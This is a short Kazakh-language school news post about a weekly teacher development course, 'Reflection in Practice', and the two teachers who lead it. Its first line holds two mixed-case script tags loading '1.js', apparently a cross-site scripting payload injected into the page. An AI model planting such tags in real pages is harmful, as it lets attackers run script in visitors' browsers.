<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.01.2017

Біліктілік курсы

Қазақстан Республикасында орта білім беру мазмұнын жаңарту аясында мұғалімдердің оқыту тәжірибесін жетілдіру қажеттілігінің маңызы арта түсуде. Мектебімізде аптаның әр бейсенбісінде «Тәжірибедегі рефлексия» атты курс сабақтары өтіп жатыр. Мектеп мұғалімдері қыркүйек айынан бастап, курс сабақтарын оқып келеді. Екі топқа тренер болып сабақ беріп жүрген - I деңгейлік курс бітірген, жоғары санатты ұстаздар Садвакасова Гульбану Сламияновна мен Саутбаева Алмагуль Болатовна. Бағдарламаның мақсаты: Педагогика кадрларына оқушылардың шығармашылық, зерттеу, сын тұрғысынан ойлау, логикалық ойлау және проблемаларды шешу дағдыларын дамытуға көмектесетін педагогикалық әдіс-тәсілдерді меңгерту. Ұстаздар курстан алған тәжірибелерді өз сабақтарында қолданып, шеберліктерін арттыруда. Біз, тренерлер, әріптестерімізге шығармашылық табыс тілей отыра, біліктіліктерін арттырып, ұстаздық еңбек жолдарында толағай табыстарға жете берулеріне тілектеспіз.

Просмотров: 634


Пікір қосу



Деректерді қолтаңбаға қосу